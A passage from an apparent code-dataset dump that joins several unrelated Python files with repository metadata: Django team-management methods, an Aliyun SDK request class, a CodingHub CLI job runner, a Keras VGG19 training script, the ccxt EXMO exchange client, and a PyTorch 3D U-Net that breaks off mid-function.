user = UserProfile.objects.get(id=user_id)
teamMember = TeamMember.create(team=team, user=user)
teamMember.save()
print("join_team")
#team.members.add(user_id)
#team.save()
return team, None
except Exception as e:
return None, CustomMassenergizeError(str(e))
def leave_team(self, team_id, user_id) -> (Team, MassEnergizeAPIError):
try:
team = Team.objects.get(id=team_id)
user = UserProfile.objects.get(id=user_id)
teamMembers = TeamMember.objects.filter(team=team, user=user)
teamMembers.delete()
print("leave_team")
#team.members.remove(user_id)
#team.admins.remove(user_id)
#team.save()
return team, None
except Exception as e:
return None, CustomMassenergizeError(str(e))
def add_team_member(self, context: Context, args) -> (Team, MassEnergizeAPIError):
try:
print(args)
team_id = args.pop('team_id', None)
user = get_user_or_die(context, args)
status = args.pop('is_admin', None) == 'true'
if not team_id :
return None, CustomMassenergizeError("Missing team_id")
team_member: TeamMember = TeamMember.objects.filter(team__id=team_id, user=user).first()
if team_member:
team_member.is_admin = status
team_member.save()
else:
team = Team.objects.filter(pk=team_id).first()
if not team_id and not user:
return None, CustomMassenergizeError("Invalid team or user")
team_member = TeamMember.objects.create(is_admin=status, team=team, user=user)
return team_member, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def remove_team_member(self, context: Context, args) -> (Team, MassEnergizeAPIError):
try:
team_id = args.pop('team_id', None)
user = get_user_or_die(context, args)
res = {}
if team_id and user:
team_member = TeamMember.objects.filter(team__id=team_id, user=user)
res = team_member.delete()
return res, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def members(self, context: Context, args) -> (Team, MassEnergizeAPIError):
try:
if not context.user_is_admin():
return None, NotAuthorizedError()
team_id = args.get('team_id', None)
if not team_id:
return [], CustomMassenergizeError('Please provide a valid team_id')
members = TeamMember.objects.filter(is_deleted=False, team__id=team_id)
return members, None
except Exception:
return None, InvalidResourceError()
def list_teams_for_community_admin(self, context: Context, args) -> (list, MassEnergizeAPIError):
try:
if context.user_is_super_admin:
return self.list_teams_for_super_admin(context)
elif not context.user_is_community_admin:
return None, NotAuthorizedError()
community_id = args.pop('community_id', None)
if not community_id:
user = UserProfile.objects.get(pk=context.user_id)
admin_groups = user.communityadmingroup_set.all()
comm_ids = [ag.community.id for ag in admin_groups]
teams = Team.objects.filter(community__id__in = comm_ids, is_deleted=False).select_related('logo', 'community')
return teams, None
teams = Team.objects.filter(community__id = community_id, is_deleted=False).select_related('logo', 'community')
return teams, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def list_teams_for_super_admin(self, context: Context):
try:
if not context.user_is_super_admin:
return None, NotAuthorizedError()
teams = Team.objects.filter(is_deleted=False).select_related('logo', 'community')
return teams, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(str(e))
| 33.872727
| 145
| 0.659796
|
e7ecbdd676e062d9dbb02397884e661395c9698e
| 1,348
|
py
|
Python
|
aliyun-python-sdk-elasticsearch/aliyunsdkelasticsearch/request/v20170613/CreateDataSourceRequest.py
|
ankitdobhal/aliyun-openapi-python-sdk
|
991b1c2d91adc468480defc23ba790d4369cce7b
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-elasticsearch/aliyunsdkelasticsearch/request/v20170613/CreateDataSourceRequest.py
|
ankitdobhal/aliyun-openapi-python-sdk
|
991b1c2d91adc468480defc23ba790d4369cce7b
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-elasticsearch/aliyunsdkelasticsearch/request/v20170613/CreateDataSourceRequest.py
|
ankitdobhal/aliyun-openapi-python-sdk
|
991b1c2d91adc468480defc23ba790d4369cce7b
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RoaRequest
from aliyunsdkelasticsearch.endpoint import endpoint_data
class CreateDataSourceRequest(RoaRequest):
def __init__(self):
RoaRequest.__init__(self, 'elasticsearch', '2017-06-13', 'CreateDataSource','elasticsearch')
self.set_uri_pattern('/openapi/datasources')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
| 40.848485
| 95
| 0.775223
|
acd846dd1f365e41268b403eb39e1a57fcece476
| 13,763
|
py
|
Python
|
ch/cli/run.py
|
zuiwan/CodingHub-CLI
|
9ced732de351412f1fd32b3a5eb67117e42779f6
|
[
"Apache-2.0"
] | null | null | null |
ch/cli/run.py
|
zuiwan/CodingHub-CLI
|
9ced732de351412f1fd32b3a5eb67117e42779f6
|
[
"Apache-2.0"
] | null | null | null |
ch/cli/run.py
|
zuiwan/CodingHub-CLI
|
9ced732de351412f1fd32b3a5eb67117e42779f6
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from __future__ import print_function
import shutil
import click
import sys
from checksumdir import dirhash
try:
from pipes import quote as shell_quote
except ImportError:
from shlex import quote as shell_quote
from tabulate import tabulate
from time import sleep
from ch.cli.utils import (wait_for_url, get_files_in_current_directory, sizeof_fmt, copy_files)
from ch.client.env import EnvClient
from ch.client.job import ExperimentClient
from ch.client.project import ProjectClient
from ch.manager.auth_config import AuthConfigManager
from ch.manager.experiment_config import ExperimentConfigManager
from ch.model.job import JobReq, JobSpecification
from ch.log import logger as logger
import webbrowser
_TEMP_DIR = ".codinghubTemp"
@click.command()
@click.option('--data',
multiple=True,
help='Data source id(s) to use')
@click.option('--jupyter/--no-jupyter',
help='Open jupyter mode',
default=False)
@click.option('--resubmit/--no-resubmit',
help='Resubmit job request (will not create new job, generally after the last submit is rejected)',
default=False)
@click.option('--eager/--no-eager',
help='Run instantly(as soon as fast)',
default=False)
@click.option('--value',
type=click.FLOAT,
help='Bidding price(¥Yuan) for this run')
@click.option('--duration',
type=click.STRING,
help='Estimated total duration of this run, format like "7d5h10m2s" in golang')
@click.option('--earliest',
type=str,
help='The beginning of time window for this run')
@click.option('--deadline',
type=str,
help='The deadline of time window for this run')
@click.option('--tensorboard/--no-tensorboard',
help='Open tensorboard service',
default=False)
@click.option('--env',
help='Deep learning framework environment type to use')
@click.option('--os',
help="Operating System to use")
@click.option('-gt', '--gputype',
help="GPU type to use")
@click.option('-gn', '--gpunum',
help="GPU card num to use")
@click.option('-ct', '--cputype',
help="CPU type to use")
@click.option('-cn', '--cpunum',
help='CPU core num to use')
@click.option('-mt', '--memtype',
help="Memory type to use")
@click.option('-mn', '--memnum',
help='Memory GB num to use')
@click.option('--message', '-m',
help='Message to commit',
type=click.STRING,
default="")
@click.option('--version', '-v',
help='Code Version to run',
type=click.INT)
# @click.option('--tensorboard/--no-tensorboard',
# help='Run tensorboard')
@click.argument('command', nargs=-1)
def run(resubmit, command, env, jupyter, tensorboard, data, version, message, os, cputype, cpunum, gputype, gpunum,
memtype, memnum, eager, value, earliest, deadline, duration):
'''
:param resubmit:
:param command:
:param env:
:param jupyter:
:param tensorboard:
:param data:
:param version:
:param message:
:param os:
:param cputype:
:param cpunum:
:param gputype:
:param gpunum:
:param memtype:
:param memnum:
:param eager:
:param value:
:param earliest:
:param deadline:
:param duration:
:return:
'''
"""
"""
# 初始化客户端
try:
ec = ExperimentClient()
except Exception as e:
logger.error(str(e))
return
if resubmit is True:
# 只关注竞价部分的参数
jobSpec = {} # 从本地配置文件或者服务器读取上次竞价失败的(或者本地配置文件中的,上次竞价成功的也行)作业详情
jobId = jobSpec["id"]
# 提交作业请求
jobReq = JobReq(duration=duration, tw_end=deadline, tw_start=earliest, job_id=jobId, value=value,
resources=jobSpec["resources"])
resp = ec.submit(jobId, jobReq)
if resp["accepted"] == False:
logger.info("This job submit is not accepted, reason: {}".format(resp["message"]))
return
# 检查备注信息长度
if message and len(message) > 1024:
logger.error("Message body length over limit")
return
# 获取认证令牌
access_token = AuthConfigManager.get_access_token()
# 读取本地作业配置信息
experiment_config = ExperimentConfigManager.get_config()
# 组装命令成列表
command_str = ' '.join(command)
# # 处理挂载数据集
# success, data_ids = process_data_ids(data)
# if not success:
# return
# 处理深度学习框架配置
if not env:
# 未指定,获取作业所属项目的默认框架作为此次作业的框架
env = ProjectClient().get_project_info_by_id(experiment_config["project_id"]).get('default_env')
# 检查所有资源的组合是否合法
if not validate_resource_list(env, jupyter, tensorboard, os, cputype, cpunum, gputype, gpunum):
return
# 上传代码到云端或者指定云端代码
# # 如果指定了代码版本
# if version:
# module_resp = ModuleClient().get_by_entity_id_version(experiment_config.project_id, version)
# if not module_resp:
# logger.error("Remote project does not existed")
# return
# module_id = module_resp.get('id')
# else:
# # Gen temp dir
# try:
# # upload_files, total_file_size_fmt, total_file_size = get_files_in_directory('.', 'code')
# # save_dir(upload_files, _TEMP_DIR)
# file_count, size = get_files_in_current_directory('code')
# if size > 100 * 1024 * 1024:
# sys.exit("Total size: {}. "
# "Code size too large to sync, please keep it under 100MB."
# "If you have data files in the current directory, please upload them "
# "separately using \"russell data\" command and remove them from here.\n".format(
# sizeof_fmt(size)))
# copy_files('.', _TEMP_DIR)
# except OSError:
# sys.exit("Directory contains too many files to upload. Add unused directories to .russellignore file.")
# # logger.info("Creating project run. Total upload size: {}".format(total_file_size_fmt))
# # logger.debug("Creating module. Uploading: {} files".format(len(upload_files)))
#
# hash_code = dirhash(_TEMP_DIR)
# logger.debug("Checking MD5 ...")
# module_resp = ModuleClient().get_by_codehash_entity_id(hash_code, experiment_config.project_id)
# if module_resp: # if code same with older version, use existed, don`t need upload
# module_id = module_resp.get('id')
# version = module_resp.get('version')
# logger.info("Use older version-{}.".format(version))
# else:
# version = experiment_config.version
# # Create module
# module = Module(name=experiment_config.name,
# description=message,
# family_id=experiment_config.family_id,
# version=version,
# module_type="code",
# entity_id=experiment_config.project_id
# )
# module_resp = mc.create(module)
# if not module_resp:
# logger.error("Remote project does not existed")
# return
# version = module_resp.get('version')
# experiment_config.set_version(version=version)
# ExperimentConfigManager.set_config(experiment_config)
#
# module_id = module_resp.get('id')
# project_id = module_resp.get('entity_id')
# if not project_id == experiment_config.project_id:
# logger.error("Project conflict")
#
# logger.debug("Created module with id : {}".format(module_id))
#
# # Upload code to fs
# logger.info("Syncing code ...")
# fc = FsClient()
# try:
# fc.socket_upload(file_type="code",
# filename=_TEMP_DIR,
# access_token=access_token.token,
# file_id=module_id,
# user_name=access_token.username,
# data_name=experiment_config.name)
# except Exception as e:
# shutil.rmtree(_TEMP_DIR)
# logger.error("Upload failed: {}".format(str(e)))
# return
# else:
# ### check socket state, some errors like file-server down, cannot be catched by `except`
# state = fc.get_state()
# if state == SOCKET_STATE.FAILED:
# logger.error("Upload failed, please try after a while...")
# return
# finally:
# try:
# shutil.rmtree(fc.temp_dir)
# except FileNotFoundError:
# pass
#
# ModuleClient().update_codehash(module_id, hash_code)
# logger.info("\nUpload finished")
#
# # rm temp dir
# shutil.rmtree(_TEMP_DIR)
# logger.debug("Created code with id : {}".format(module_id))
# 创建作业描述指标
jobSpecification = JobSpecification(message=message, code_id="", data_ids=[],
command=command_str,
project_id=experiment_config["project_id"],
framework=env,
enable_jupyter=jupyter,
enable_tensorboard=tensorboard,
os="ubuntu:16",
gpunum=gpunum,
gputype=gputype,
cpunum=cpunum,
cputype=cputype,
memnum=memnum,
memtype=memtype)
# 提交该作业描述,由服务器保存
jobId = ec.create(jobSpecification)
logger.debug("Created job specification : {}".format(jobId))
# # 更新本地作业配置
# experiment_config.set_experiment_predecessor(experiment_id)
# ExperimentConfigManager.set_config(experiment_config)
# 打印作业描述信息
experiment_name = "{}/{}:{}".format(access_token.username,
experiment_config["project_id"],
version)
table_output = [["JOB ID", "NAME", "VERSION"],
[jobId, experiment_name, version]]
logger.info(tabulate(table_output, headers="firstrow"))
logger.info("")
# 提交作业请求
jobReq = JobReq(duration=duration, tw_end=deadline, tw_start=earliest, job_id=jobId, value=value,
resources=jobSpecification.resources)
resp = ec.submit(jobId, jobReq)
if resp["accepted"] == False:
logger.info("This job submit is not accepted, reason: {}".format(resp["message"]))
return
# 作业成功提交后,处理jupyter/tensorboard
task_url = {}
if jupyter is True:
while True:
# Wait for the experiment / task instances to become available
try:
experiment = ec.get(jobId)
if experiment.state != "waiting" and experiment.task_instances:
break
except Exception as e:
logger.debug("Experiment not available yet: {}".format(jobId))
logger.debug("Experiment not available yet: {}".format(jobId))
sleep(1)
continue
task_url = ec.get_task_url(jobId)
jupyter_url = task_url["jupyter_url"]
print("Setting up your instance and waiting for Jupyter notebook to become available ...")
if wait_for_url(jupyter_url, sleep_duration_seconds=2, iterations=900):
logger.info("\nPath to jupyter notebook: {}".format(jupyter_url))
webbrowser.open(jupyter_url)
else:
logger.info("\nPath to jupyter notebook: {}".format(jupyter_url))
logger.info(
"Notebook is still loading or can not be connected now. View logs to track progress")
if tensorboard is True:
if not task_url.get("tensorboard_url"):
task_url = ec.get_task_url(jobId)
tensorboard_url = task_url["tensorboard_url"]
logger.info("\nPath to tensorboard: {}".format(tensorboard_url))
logger.info("""
To view logs enter:
ch logs {}
""".format(jobId))
def validate_resource_list(env, jupyter, tensorboard, os, cputype, cpunum, gputype, gpunum):
# TODO
return True
def process_data_ids(data):
# TODO
if len(data) > 5:
logger.error(
"Cannot attach more than 5 datasets to a task")
return False, None
# Get the data entity from the server to:
# 1. Confirm that the data id or uri exists and has the right permissions
# 2. If uri is used, get the id of the dataset
data_ids = []
mc = DataClient()
for data_id_and_path in data:
if ':' in data_id_and_path:
data_id, path = data_id_and_path.split(':')
else:
data_id = data_id_and_path
path = None
data_obj = mc.get(data_id)
if not data_obj:
logger.error("Data not found by id: {}".format(data_id))
return False, None
else:
if path is None:
path = "{}-{}".format(data_obj.name, data_obj.version)
data_ids.append("{id}:{path}".format(id=data_obj.id, path=path))
return True, data_ids
| 38.769014
| 117
| 0.567536
|
c7f400e7edc61e1168d86d42c000d8ad44a1cada
| 7,631
|
py
|
Python
|
examples/pwr_run/checkpointing/final/feedback_v100_only/job69.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/final/feedback_v100_only/job69.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/final/feedback_v100_only/job69.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.0007
args_model = 'vgg19'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_feedback_fair/' + job_name + '*'
total_epochs = 45
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
if epoch_waste_time > 0:
send_signal.send(args.node, 10002, message)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_feedback_fair/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
message = job_name + ' checkpoint'
send_signal.send(args.node, 10002, message)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch, first_epoch_start
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
if epoch == starting_epoch and args.resume:
first_epoch_start = time.time()
message = job_name + ' d_end'
send_signal.send(args.node, 10002, message)
elif epoch == starting_epoch:
first_epoch_start = time.time()
if epoch == starting_epoch:
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
def on_epoch_end(self, epoch, logs=None):
if epoch == starting_epoch:
first_epoch_time = int(time.time() - first_epoch_start)
message = job_name + ' 1st_epoch ' + str(first_epoch_time)
send_signal.send(args.node, 10002, message)
progress = round((epoch+1) / round(total_epochs/2), 2)
message = job_name + ' completion ' + str(progress)
send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 32.751073
| 118
| 0.693618
|
d7d2d0cb92d8f12c57b42bf07cdbb0dccf6f70d3
| 8,879
|
py
|
Python
|
python/ccxt/exmo.py
|
morgwn-shaw/bttb
|
a0e8dac53f233f747ad1c50c13a1d4b2d0ca14a5
|
[
"MIT"
] | 3
|
2017-11-19T22:08:29.000Z
|
2018-02-21T11:14:41.000Z
|
python/ccxt/exmo.py
|
morgwn-shaw/bttb
|
a0e8dac53f233f747ad1c50c13a1d4b2d0ca14a5
|
[
"MIT"
] | null | null | null |
python/ccxt/exmo.py
|
morgwn-shaw/bttb
|
a0e8dac53f233f747ad1c50c13a1d4b2d0ca14a5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from ccxt.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
class exmo (Exchange):
def describe(self):
return self.deep_extend(super(exmo, self).describe(), {
'id': 'exmo',
'name': 'EXMO',
'countries': ['ES', 'RU'], # Spain, Russia
'rateLimit': 1000, # once every 350 ms ≈ 180 requests per minute ≈ 3 requests per second
'version': 'v1',
'hasCORS': False,
'hasFetchTickers': True,
'hasWithdraw': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766491-1b0ea956-5eda-11e7-9225-40d67b481b8d.jpg',
'api': 'https://api.exmo.com',
'www': 'https://exmo.me',
'doc': [
'https://exmo.me/en/api_doc',
'https://github.com/exmo-dev/exmo_api_lib/tree/master/nodejs',
],
},
'api': {
'public': {
'get': [
'currency',
'order_book',
'pair_settings',
'ticker',
'trades',
],
},
'private': {
'post': [
'user_info',
'order_create',
'order_cancel',
'user_open_orders',
'user_trades',
'user_cancelled_orders',
'order_trades',
'required_amount',
'deposit_address',
'withdraw_crypt',
'withdraw_get_txid',
'excode_create',
'excode_load',
'wallet_history',
],
},
},
'fees': {
'trading': {
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
},
})
def fetch_markets(self):
markets = self.publicGetPairSettings()
keys = list(markets.keys())
result = []
for p in range(0, len(keys)):
id = keys[p]
market = markets[id]
symbol = id.replace('_', '/')
base, quote = symbol.split('/')
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'limits': {
'amount': {
'min': market['min_quantity'],
'max': market['max_quantity'],
},
'price': {
'min': market['min_price'],
'max': market['max_price'],
},
'cost': {
'min': market['min_amount'],
'max': market['max_amount'],
},
},
'precision': {
'amount': 8,
'price': 8,
},
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostUserInfo()
result = {'info': response}
for c in range(0, len(self.currencies)):
currency = self.currencies[c]
account = self.account()
if currency in response['balances']:
account['free'] = float(response['balances'][currency])
if currency in response['reserved']:
account['used'] = float(response['reserved'][currency])
account['total'] = self.sum(account['free'], account['used'])
result[currency] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicGetOrderBook(self.extend({
'pair': market['id'],
}, params))
orderbook = response[market['id']]
return self.parse_order_book(orderbook, None, 'bid', 'ask')
def parse_ticker(self, ticker, market=None):
timestamp = ticker['updated'] * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': float(ticker['high']),
'low': float(ticker['low']),
'bid': float(ticker['buy_price']),
'ask': float(ticker['sell_price']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['last_trade']),
'change': None,
'percentage': None,
'average': float(ticker['avg']),
'baseVolume': float(ticker['vol']),
'quoteVolume': float(ticker['vol_curr']),
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTicker(params)
result = {}
ids = list(response.keys())
for i in range(0, len(ids)):
id = ids[i]
market = self.markets_by_id[id]
symbol = market['symbol']
ticker = response[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
response = self.publicGetTicker(params)
market = self.market(symbol)
return self.parse_ticker(response[market['id']], market)
def parse_trade(self, trade, market):
timestamp = trade['date'] * 1000
return {
'id': str(trade['trade_id']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'order': None,
'type': None,
'side': trade['type'],
'price': float(trade['price']),
'amount': float(trade['quantity']),
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicGetTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response[market['id']], market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
prefix = ''
if type == 'market':
prefix = 'market_'
if price is None:
price = 0
order = {
'pair': self.market_id(symbol),
'quantity': amount,
'price': price,
'type': prefix + side,
}
response = self.privatePostOrderCreate(self.extend(order, params))
return {
'info': response,
'id': str(response['order_id']),
}
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
return self.privatePostOrderCancel({'order_id': id})
def withdraw(self, currency, amount, address, params={}):
self.load_markets()
result = self.privatePostWithdrawCrypt(self.extend({
'amount': amount,
'currency': currency,
'address': address,
}, params))
return {
'info': result,
'id': result['task_id'],
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
else:
nonce = self.nonce()
body = self.urlencode(self.extend({'nonce': nonce}, params))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Key': self.apiKey,
'Sign': self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'result' in response:
if response['result']:
return response
raise ExchangeError(self.id + ' ' + self.json(response))
return response
| 35.374502
| 126
| 0.463453
|
fdbf5d346c596b15ed39108d549e413e9a296110
| 3,599
|
py
|
Python
|
pytorch/model.py
|
ginobilinie/3d-unet
|
164978b4421c2196e6066bc5391ace5b83ab2216
|
[
"MIT"
] | 1
|
2021-04-14T05:36:55.000Z
|
2021-04-14T05:36:55.000Z
|
pytorch/model.py
|
ginobilinie/3d-unet
|
164978b4421c2196e6066bc5391ace5b83ab2216
|
[
"MIT"
] | null | null | null |
pytorch/model.py
|
ginobilinie/3d-unet
|
164978b4421c2196e6066bc5391ace5b83ab2216
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
class UNet3D(nn.Module):
def __init__(self, in_channel, n_classes):
self.in_channel = in_channel
self.n_classes = n_classes
super(UNet3D, self).__init__()
self.ec0 = self.encoder(self.in_channel, 32, bias=False, batchnorm=False)
self.ec1 = self.encoder(32, 64, bias=False, batchnorm=False)
self.ec2 = self.encoder(64, 64, bias=False, batchnorm=False)
self.ec3 = self.encoder(64, 128, bias=False, batchnorm=False)
self.ec4 = self.encoder(128, 128, bias=False, batchnorm=False)
self.ec5 = self.encoder(128, 256, bias=False, batchnorm=False)
self.ec6 = self.encoder(256, 256, bias=False, batchnorm=False)
self.ec7 = self.encoder(256, 512, bias=False, batchnorm=False)
self.pool0 = nn.MaxPool3d(2)
self.pool1 = nn.MaxPool3d(2)
self.pool2 = nn.MaxPool3d(2)
self.dc9 = self.decoder(512, 512, kernel_size=2, stride=2, bias=False)
self.dc8 = self.decoder(256 + 512, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.dc7 = self.decoder(256, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.dc6 = self.decoder(256, 256, kernel_size=2, stride=2, bias=False)
self.dc5 = self.decoder(128 + 256, 128, kernel_size=3, stride=1, padding=1, bias=False)
self.dc4 = self.decoder(128, 128, kernel_size=3, stride=1, padding=1, bias=False)
self.dc3 = self.decoder(128, 128, kernel_size=2, stride=2, bias=False)
self.dc2 = self.decoder(64 + 128, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.dc1 = self.decoder(64, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.dc0 = self.decoder(64, n_classes, kernel_size=1, stride=1, bias=False)
def encoder(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
bias=True, batchnorm=False):
if batchnorm:
layer = nn.Sequential(
nn.Conv3d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=bias),
nn.BatchNorm2d(out_channels),
nn.ReLU())
else:
layer = nn.Sequential(
nn.Conv3d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=bias),
nn.ReLU())
return layer
def decoder(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, bias=True):
layer = nn.Sequential(
nn.ConvTranspose3d(in_channels, out_channels, kernel_size, stride=stride,
padding=padding, output_padding=output_padding, bias=bias),
nn.ReLU())
return layer
def forward(self, x):
e0 = self.ec0(x)
